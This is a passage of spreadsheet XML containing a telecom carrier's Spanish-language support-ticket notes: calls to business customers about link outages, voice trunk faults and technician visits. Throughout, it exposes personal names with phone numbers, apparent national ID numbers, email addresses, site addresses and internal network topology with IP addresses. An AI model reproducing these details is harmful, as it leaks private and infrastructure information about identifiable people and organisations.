CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; N2CLAROHN &lt;N2CLAROHN@CLARO.COM.HN&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || 1747951OH || SD1139803
BUENA TARDE
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
JOHN RAMOS          0501-1995-07643
HUGO PINEDA         0501-2000-09002
ORLIN FUENTES       1618-1986-00852
OSCAR PAZ                0501-2000-11392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621844</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON PERSONAL TÉCNICO ASIGNADO; ADICIONAL SE HABLÓ CON EDWIN VALENZUELA/CLIENTE 43215457 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4621848</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, POR LO DICHO EN CRONO ANTERIOR SE CONSULTA A GESTIÓN N1 VÍA SKYPE, SI ES POSIBLE MOVER TICKET A MONITOREO PARA MAÑANA A LAS 17:00 HORAS.</t>
  </si>
  <si>
    <t>F4621877</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS GUTIERREZ 51190146 MENCIONA QUE TENIA ENTENDIDO QUE NO TENIAN ENERGIA PERO INDICA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 3001004090</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS GUTIERREZ 51190146 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001007884</t>
  </si>
  <si>
    <t>F4621879</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE CESAR GIRON  54620902 NO RESPONDE SE INTENTARA LUEGO **
-ID 3001063769
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR GIRON 54620902 SIGUE SIN RESPONDER, SE INTENTARA LUEGO
-ID 3001323826 - 3001324270</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CESAR GIRON 54620902 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001335987</t>
  </si>
  <si>
    <t>HASTA EL MOMENTO ENLACE OK ASÍ LO DETERMINÓ GESTIÓN AE; A SOLICITUD DE CLIENTE SE DARÁ SEGUIMIENTO MAÑANA A PARTIR DE LAS 08:00AM, SI TODO OK, SE DEBE VALIDAR SERVICIO.</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE CESAR GIRON  54620902 INDICA QUE POR EL  MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE QUEDE EN OBSERVACION 24 HRS MAS YA QUE AYER EN LA TARDE ESTUVO INTERMITENTE**
-ID 3001073670
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR GIRON 54620902 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001065819</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR GIRON 54620902 NO RESPONDE, SE INTENTAR ALUEGO
-ID 3001303619 - 3001304200</t>
  </si>
  <si>
    <t>F4621891</t>
  </si>
  <si>
    <t>### SE TIENE A CLIENTE EN LINEA CARLOS RENE MONTANO ARIAS-76963351-   ##  INDICA QUE SE DE SEGUIMIENTO POR LA TARDE, ##PIDE SE LE LLAME PARA CONFIRMAR A LAS 3PM SI SE PUEDEN REALIZAR PRUEBAS A ESA HORA. DEBIDO A QUE NECESITAMOS DE  ALGUIEN QUE NOS PUEDA APOYAR CON PRUEBAS ##
3001271423
COLA:
NOMBRE: A: 0050376963351
NÚMERO: 0050376963351
DURACIÓN: 0:01:53
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050376963351
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 1/07/2022 09:03:36</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RENE MONTANO ARIAS 23473326 MENCIONA QUE  CARLOS RENE MONTANO NO ESTA EN PR POR LO QUE SOLICITA LLAMADA EN 15 MIN
-ID 3001763466</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RENE MONTANO ARIAS 23473326 MENCIONA QUE YA REALIZARON LAS PRUEBAS, CLIENTE CONFIRMA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001768509</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RENE MONTANO 76963351 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001014150</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RENE MONTANO ARIAS 76963351-23473326 MENCIONA QUE AUN NO HA TERMINADO DE REALIZAR PRUEBAS POR LO QUE SOLICITA LLAMADA A LAS 11:00 HRS
-ID 3001679783 - 3001680019</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RENE MONTANO ARIAS -23473326 MENCIONA QUE SE ENCUENTRA OCUPADO POR LO QUE SOLICITA LLAMADA EN 20 MIN
-ID 3001714926</t>
  </si>
  <si>
    <t>CLEINTE CARLOS RENE MONTANO ARIAS-76963351-23473326  IINDIC AUE NO APOYARA  EL SEÑOR   78417705  -LUIS MARIO ### VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EL SEÑOR   78417705  -LUIS MARIO  ##INDICA QUE NOS APOYARA EN 10 MINUTOS ##3VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RENE MONTANO ARIAS-76963351- PARA VERIFICAR SI SE PEUDEN REALIZAR PRUEBAS ##</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RENE MONTANO ARIAS -23473326 MENCIONA QUE AUN ESTA PENDIENTE REALIZAR PRUEBAS CON 2 MOVILES POR LO QUE SOLICITA LLAMADA A LAS 15:00 HRS
-ID 3001721785</t>
  </si>
  <si>
    <t>SE LLAMA ATAMBIEN AL 23473300 Y NADIE CONTESTA ##SE INTENTARON 2 VECES ##VIVO</t>
  </si>
  <si>
    <t>SE LLAAMA A CLIENTE CARLOS RENE MONTANO ARIAS-76963351  ## 2 VECS ## NO CONTESTA ## ENVIA DIRECTO A BUZON ## VIVO</t>
  </si>
  <si>
    <t>SE LLAMA ALCIENTE 3 VECES## MANDA DIRECTO A BUZON ## CARLOS RENE MONTANO ARIAS-76963351-23473326 ## VIVO ##SE INTENTARA LUEGO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS  MONTANO -76963351 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001389298</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RENE 76963351 - 23473326 MENCIONA QUE TIENE PROBLEMAS CON ALGUNOS DID, CLIENTE NO BRINDA CUALES SON LOS DID PERO SOLICITA SE PUEDA COMPARTIR POR CORREO LAS PRUEBAS O INDICANDO SI HAY INCONVENIENTE CON LOS DID
JEFE.OPERACIONES@CAJASANVICENTE.COM
-ID 3001067031</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE CARLOS RENE MONTANO ARIAS-76963351 Y EN PRUEBAS REALZIADAS SE DETECTA LO SIGUIENTE:
LOS NUMEROS  CELULARES DE CLARO QUE TRATAN DE LLAMAR AL E1  LA MAYORITA NO ESTAN COMPLETANDO LAS LLAMADAS, AL SEGUNDO SE CORTAN PERO, LLAMADA DESDE CIC  Y VIVO DESDE GUATEMALA A LAS EXTENSIONES SI COMPLETAN- SE OBSERVA QUE ESTE SERVICIO FUE MIGRADO RECIENTEMENTE A MSAM.
SE ADJUNTA LISTA DE DONDE SE HA PROBADO LLAMAR AL GDN Y NO SE TIENE EXLITO EN LAS LLAMADAS.
CLARO MOVILES-
78413908  -CARLOS MORALES.
78417705  -LUIS MARIO
78612338  -YOSELIN
70394993  -LAURA</t>
  </si>
  <si>
    <t>SE LLLAMA A CLIENTE CARLOS RENE MONTANO ARIAS-76963351   SE TIENE EN LINEA ##
3001069497
COLA:
NOMBRE: A: 0050376963351
NÚMERO: 0050376963351
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 0050376963351
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/06/2022 08:22:07</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS RENE MONTANO 76963351 NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO*
-ID 3001064056
**</t>
  </si>
  <si>
    <t>F4621910</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR CASTRO AL 72681515 CONFIRMA SERVICIO ESTABLE Y OPERATIVO ||
AUTORIZA CIERRE DEL TICKET **
-ID 3001148411
**</t>
  </si>
  <si>
    <t>F4621914</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GREGORIA HENRIQUEZ 79956541 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE TRATA DE DEJAR EN CONFERENCIA PERO CLIENTE CORTA LA LLAMADA
-ID 2001999068</t>
  </si>
  <si>
    <t>F4621920</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIRO HERNANDEZ 42678092 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001009206</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEJANDRO URBINA 58730199 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001008548 - 3001008920</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN LUIS CAMACHO 42190854  MENCIONA NUMERO EQUIVOCADO
-ID 2001008206</t>
  </si>
  <si>
    <t>F4621924</t>
  </si>
  <si>
    <t>RANDALL HERNANDEZ -49722291  ### SE TEIENE EN LINEA ##</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO MARTINEZ AL 41548555 INDICA QUE NO SE ENCUENTRA EN SITIO SOLICITA QUE SE LLAME AL PRIMER NUMERO DE RANDALL EN 15 MIN **
-ID 3001081049
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RANDALL HERNANDEZ   AL 49722291  NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001080508
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RANDALL HERNANDEZ -49722291  ##SE TIENE EN LINEA
3001111409
COLA:
NOMBRE: A: 49722291
NÚMERO: 011 50249722291
DURACIÓN: 0:00:35
ESTADO: CONECTADA
DETALLES: +50249722291
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/06/2022 10:44:06</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 22709292 SE OBSERVA QUE SI HAY TONO PERO NADIE CONTESTA##
3001110374
COLA:
NOMBRE: A: 22709292
NÚMERO: 22709292
DURACIÓN: 0:01:13
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22709292
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/06/2022 10:42:55
3001111041
COLA:
NOMBRE: A: 22709292
NÚMERO: 22709292
DURACIÓN: 0:00:21
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22709292
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/06/2022 10:42:59
RESULTADO: LLAMADA HECHA
NOMBRE: 22709292
NÚMERO: 22709292
INICIO: HOY, 09:15
FIN: HOY, 09:15
DURACIÓN: 0:02
ID DE LLAMADA: 3001083670</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RANDALL HERNANDEZ -49722291 INDICA QUE AUN NO PUEDE RECIBIR LLAMADAS SOLO PUEDE REALIZAR || SE NOTIFICA A GESTOR **
-ID 3001086034
**</t>
  </si>
  <si>
    <t>SE CORTA LLAMADA### SE LLAMA NUEVAMENTE A CLIENTE DESDE VIVO Y NO CONTESTA### SE INTENTARA LUEGO##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RANDALL HERNANDEZ -49722291    ## NO CONTESTA##SE INTENTARA LUEGO ## A NIVEL DE CLARO TODO OK ## SE DEBE CONSULTAR QUE REPORTA-
3001083714
COLA:
NOMBRE: A: 49722291
NÚMERO: 55280199
DURACIÓN: 0:00:30
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/06/2022 09:16:34
3001083893
COLA:
NOMBRE: A: 49722291
NÚMERO: 49722291
DURACIÓN: 0:00:14
ESTADO: MARCANDO
DETALLES: 49722291
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/06/2022 09:16:57</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE RANDALL HERNANDEZ -49722291  QUIEN EXPLICA QUE NO LE ESTAN ENTRANDO LLAMADAS, LA LLAMADA SI SUENA EN EN ORIGEN PERO EN EL DESTINO NO . + COMENTA QUE APERTURO TICKET PARA QUE  SE LE BRINDARA AYUDA PARA QUE LE BRINDARAMOS  CONTACTOR CON PROVEEDORES DE PBX. PERO SE LE INDICA QUE ESTA UNICAMENTE ES EL AREA DE FALLA- Y NO TENEMOS CONTACTO CON PROVEEDORES- POR LO QUE EL TIENE QUE BUSCARLOS O ASESORARSE CON EJECUTIVO ##QUEDA ENTERADO##VIVO</t>
  </si>
  <si>
    <t>F4621933</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BEYNER GUTIERREZ 57365383 PERO ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 3001205606</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE BEYNER GUTIERREZ 57365383 MENCIONA QUE EL DIA DE AYER PRESENTARON PROBLEMA DE ENERGIA POR MANTENIMIENTO
CLIENTE CONFIRMA QUE SI CUENTAN CON ENERGIA Y EL ESTARA ATENDIENDO A PERSONAL TECNICO
-ID 3001258827
NOMBRE DEL CLIENTE: BICU (BLUEFIELDS INDIAN CARIBBEAN UNIV.)-
UBICACIÓN:  DE LA OFICINA EMPRESA NAFCOSA 1.5KM AL NOROESTE, BILWI.
CONTACTO EN SITIO: BEYNER GUTIERREZ 57365383
HORARIO DE ATENCION:8:00 AM  A 4:30 PM
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BEYNER GUTIERREZ 57365383 PERO ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO**
-ID 3001214578
**</t>
  </si>
  <si>
    <t>F4621946</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE MIGUEL FUENTES 50178299, CLIENTE UBICA AETHRA 6044 SE LE SOLICITA REINICIARLO</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE MIGUEL FUENTES 50178299, INDICA QUE TIENE 3 E1 DIFERENTES, CLIENTE UBICA EQUIPO AETHRA EN SUS INSTALACIONES CON EL ID 686600002T SE VERIFICA Y ESTE SERVICIO YA SE MIGRÓ A LA RED CLARO.
SE UBICA EL SIGUIENTE DISEÑO:
PE HUAWEI SOFTX3000 (CENTRAL DE VOZ) --&gt; HUAWEI SBC2300 ZAPOTE (10.10.15.160) ET1/0/0--&gt; GI1/20 CISCO 7609-S ZAPOTE# (10.184.12.9) --&gt; INTER_AS_XT_TO_CLARO --&gt;  HUAWEI NE40E LOURDES GNCYGTLON2D1D01A02EIM3 (10.179.28.12) --&gt;HUAWEI NE40E LOURDES GNCYGTLON2D1D02A02EIM2 (10.179.28.11) --&gt; HUAWEI ATN910C GNCYGTLON1D1A04A32ENM11 (10.78.16.144) ETH-TRUNK4 (GI0/2/13, GI 0/2/14) --&gt; TRÁFICO LOU-ETX-1300-02 GNCYGTLON2D2F0N1 (10.31.255.56) PTO 7 --&gt; FIBRA --&gt; ETX1 (10.78.130.28) (PUERTO 4) --&gt; AETHRA --&gt; PLANTA TELEFÓNICA E1</t>
  </si>
  <si>
    <t>F4621947</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A DANA ABADÍO/EJECUTIVA CLARO; SE LE INFORMA QUE GESTOR ESTÁ POR FINALIZAR SUS PRUEBAS VÍA REMOTA, AVANCES EN 20/25 MINUTOS.</t>
  </si>
  <si>
    <t>F4621976</t>
  </si>
  <si>
    <t>CLEINTE VALIDA ERWIN SOLANO-9794-9495 ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERWIN SOLANO 97949495 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001015740</t>
  </si>
  <si>
    <t>F4621978</t>
  </si>
  <si>
    <t>SE COORDINARÁ VISITA TÉCNICA MAÑANA A LAS 08:00AM A SOLICITUD DE CLIENTE DEBIDO A LA REINCIDENCIA DE LO REPORTADO, OPERACIONES METRO ENTERADOS.</t>
  </si>
  <si>
    <t>F4621981</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. WILSON RECINOS 54892327 SE LE INFORMA LO DETERMINADO SOLICITA ENVIAR POR CORREO LA EVIDENCIA, CONFIRMA QUE SI TIENE CONEXION A LA IP PUBLICA DEL ROUTER CISCO 181.209.188.9 LO QUE CONFIRMA QUE A NIVEL DE CLARO ESTA OPERATIVO.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO CON EVIDENCIA, SE PROCEDE AL CIERRE DEL INCIDENTE, ENLACE A NIVEL DE CLARO OK.
ENLACE OPERATIVO 333600036 || ALTURISA GUATEMALA S.A.
¿</t>
  </si>
  <si>
    <t>SE HABLO CON SR. ROLANDO ESCOBAR 56310281 SE LE SOLICITA REVISAR SUS EQUIPOS INTERNOS, YA QUE POSIBLEMENTE ESTAN INHIBIDOS...</t>
  </si>
  <si>
    <t>SE CORRIGE DIRECCIÓN DE CORREO DE CLIENTE JEISSON.RECINOS@PREMIUM.GT ; EN ESPERA QUE VALIDE CIERRE DEL TICKET.
ASUNTO: ENLACE OPERATIVO 333600036 || ALTURISA GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4622043</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78533133 MENCIONA QUE PRESENTARON INCONVENIENTE CON LA ENERGIA PERO YA RETORNO, CLIENTE CONFIRMA QUE PERSISTE EL INCONVENIENTE
-ID 3001023918
NOMBRE DEL CLIENTE: ALIMENTOS Y TURISMO S.A.
UBICACIÓN:SAN FRANCISCOBOULEVARD SOBRE LA LA AUTOPISTA LOS PROCERES LOTE 4A  PIZZA HUT
CONTACTO EN SITIO: ENCARGADO DE TURNO
HORARIO DE ATENCION:5:30 - 23:30
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4622044</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SR. DANILO PAZ
ASUNTO: REVISIÓN DE ENLACE ID1126039 || MINISTERIO DEL MEDIO AMBIENTE Y RECURSOS NATURALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DANILO PAZ 21329679 CONFIRMA DE RECIBIDO EL CORREO, SE LLAMARA DESPUES DE LAS 2:30 PM YA QUE ESCALARA A SU PROVEEDOR Y ENCARGADO DEL SU FW.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DANILO PAZ 21329679 INFORMA QUE YA REALIZARON EL REPORTE AL ISP DEL SERVIDOR WEB, YA QUE SE CONFIRMO QUE A NIVEL DE CLARO TODO FUNCIONA CORRECTAMENTE, AUTORIZA EL CIERRE DEL INCIDENTE.</t>
  </si>
  <si>
    <t>INFORMAN QUE NO LOGRAN ACCEDER A LA PAGINA HTTP://SRT.MARN.GOB.SV/ SE REALIZO LA PRUEBA DESDE EL NAVEGADOR LOCAL Y NO SE LOGRO INGRESAR CUANDO SE INGRESA LA IP PUBLICA DE LA PAGINA SI SE LOGRO INGRESAR HTTP://190.151.176.121/ SE ESTA VALIDANDO COMO PROCEDER...</t>
  </si>
  <si>
    <t xml:space="preserve"> SR. DANILO PAZ 21329679 SOLICITA LLAMAR EN 5 MINS AL 24526540  Y AGREGARLO AL AUDIO PARA REALIZAR PRUEBAS ...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DANILO PAZ 21329679 SOLICITA TIEMPO YA QUE SE COMUNICARA CON EL PUNTO REMOTO, PARA RELIZAR PRUEBAS ...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. BLADIMIR 24526540 SE AGREGA A SR.  DANILO PAZ 21329679 ID: 3001093827.</t>
  </si>
  <si>
    <t>F4622064</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. ROSA 83320579 INFORMA QUE ESTA REALIZANDO PRUEBAS PROPORCIONA LA IP 10.0.200.45 DE UN SERVIDOR EN MANAGUA AL CUAL A NIVEL APLICATIVO NO TENIA CONEXION, SE LE INFORMA QUE DESDE JINOTEGA SI HAY CONEXION, ESTARA REINICIANDO SU SERVIDOR Y REALIZARA PRUEBAS NUEVAMENTE, SOLICITA QUE SE LLAME EN UNA HORA PARA VALIDAR ENLACE.
ENLACE A NIVEL DE CLARO OK CON CONEXION HACIA LA IP DEL SERVIDOR DEL CLIENTE EN MANAGUA:
POLICIA_NACIONAL_JINOTEGA#PING 10.0.200.45 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 10.0.200.45, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 10.0.248.1
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 4/4/8 MS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. ROSA 83320579 INFORMA QUE EL ENLACE NUEVAMENTE ESTA CAIDO, SE OBSERVA QUE EFECTIVAMENTE SE ENCUENTRA CAIDO, CLIENTE APLICA REINICIO AL ETX-1 PERO YA NO LEVANTO EL ENLACE:
&lt;JJINNIIJN1H1A7B01EID1&gt;PING -C 3000 -S 1400 -M 30 -B  -VPN-INSTANCE MPLS_POLICIA 10.29.10.114
  PING 10.29.10.114: 1400  DATA BYTES, PRESS CTRL_C TO BREAK
    ....................................................................................................................................................................
  --- 10.29.10.114 PING STATISTICS ---
    164 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS</t>
  </si>
  <si>
    <t>F4622089</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO CASTILLO 30442041 NO RESPONDE, SE INTENTARA LUEGP
-ID 3001148755</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA LAS 21:05 HORAS DE HOY.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FRANCISCO CASTILLO 30442041 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001182406</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO CASTILLO 30442041 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001158864</t>
  </si>
  <si>
    <t>F4622093</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LIC. ELMER RIGOBERTO GUEVARA 78509782 MENCIONA QUE EN ALGUNAS LLAMADASYA SEA ENTRANTES O SALIENTES TIENEN PROBLEMAS CON EL AUDIO, SE DEJA EN CONFERENCIA CON GESTOR
 -ID 3001036248</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE LIC ELMER PERO NO CONTESTA.
3001029406, 3001029532
COLA:
NOMBRE: A: 0050378509782
NÚMERO: 0050378509782
DURACIÓN: 0:00:38
ESTADO: CONECTADA
DETALLES: 0050378509782
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 29/06/2022 17:20:35</t>
  </si>
  <si>
    <t>3001037020
SE HABLO CON EL CLIENTE LIC ELMER, QUIEN INDICA QUE TIENE CONECTADAS VARIAS LINEAS POR APARTE EN LA PBX Y QUE EN ALGUNAS NO TIENE AUDIO. EL LEVANTA EL TELEFONO Y NO SABE DE QUE LINEA LE ESTAN HABLANDO.
ES NECESARIO REALIZAR UNA CERTIFICACION CANAL POR CANAL PARA VER SI EL PROBLEMA NO ESTA EN EL MODEM. O SI EL PROBLEMA SON LAS OTRAS LINEAS.
SE APERTURA WO PARA ASIGNACION DE PERSONAL EL DIA DE MAÑANA A LAS 8:00AM
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4895
DURACIÓN: 0:02:30
ESTADO: CONECTADA
DETALLES: 4895
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 29/06/2022 18:00:44</t>
  </si>
  <si>
    <t>F4622095</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  Y ME DICE QUE SE LLAME AL NUEMERO: 32724782 RESPONDE KAREN GARCIA
3001212065
COLA:
NOMBRE: A: 23083000
NÚMERO: 011 50223083000
DURACIÓN: 0:09:31
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50223083000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 30/06/2022 16:48:08</t>
  </si>
  <si>
    <t>SE LLAMA A LA OTRA EXTENSION, RESPONDEN PERO ME DICEN QUE EL GERENTE NI EL AUXILIAR ESTAN EN LA AGENCIA, SE QUE SE LLAME APROXIMADAMENTE EN UNAS 2 HORAS.
3001147574
COLA:
NOMBRE: A: 23083000
NÚMERO: 011 50223083000
DURACIÓN: 0:02:25
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50223083000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 30/06/2022 12:40:31</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A LA EXTENSION: 23083000 EXT. 063721  PERO NO SE TIENE RESPUESTA
3001146720
COLA:
NOMBRE: A: 23083000
NÚMERO: 011 50223083000
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50223083000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 30/06/2022 12:36:45</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA CON EL CLIENTE, CARLA GARCIA 32724782 NOS APOYA CON PRUEBAS A LOS EQUIPOS PERO NO SE LOGRA TENER RESPUESTA DEL ENLACE REDNDANTE.
3001214799
COLA:
NOMBRE: A: 32724782
NÚMERO: 011 50232724782
DURACIÓN: 0:10:57
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50232724782
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 30/06/2022 17:00:29</t>
  </si>
  <si>
    <t>F4622096</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAGOBERTO CASTRO 24871000 MENCIONA QUE NO ES NECESARIO GESTIONAR LOS PERMISOS, CLIENTE SOLICITA LA VISITA TECNICA
HORARIO DE ATENCION: 24/7
-ID 3001037348</t>
  </si>
  <si>
    <t>F4622108</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN MENENDEZ 56997634 QUIEN CONFIRMA EL FUNCIONAMIENTO
CLIENTE INDICA QUE YA NO TIENE PROBLEMA CON LA IP
-ID 3001117176</t>
  </si>
  <si>
    <t>BO SEGURIDAD CLARO APOYA CON EL DESLIST; ADICIONAL SE LLAMÓ/HABLÓ CON CHRISTIAN MENÉNDEZ CLIENTE 56997634 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4622125</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE DANIEL QUINTANIA QUIEN INDICA QUE YA POSEE SERVICIO Y SOLICITA EL CIERRE.
3001036680
COLA:
NOMBRE: A: 0050322503050
NÚMERO: 0050322503050
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 0050322503050
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 29/06/2022 17:55:57</t>
  </si>
  <si>
    <t>F4622135</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24985050  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001037995</t>
  </si>
  <si>
    <t>F4622140</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAURICIO   86681118 MENCIONA QUE TIENE PROBLEMA CON LAS DESCARGAS
SE NOTIFICARA PARA EL SEGUIMIENTO
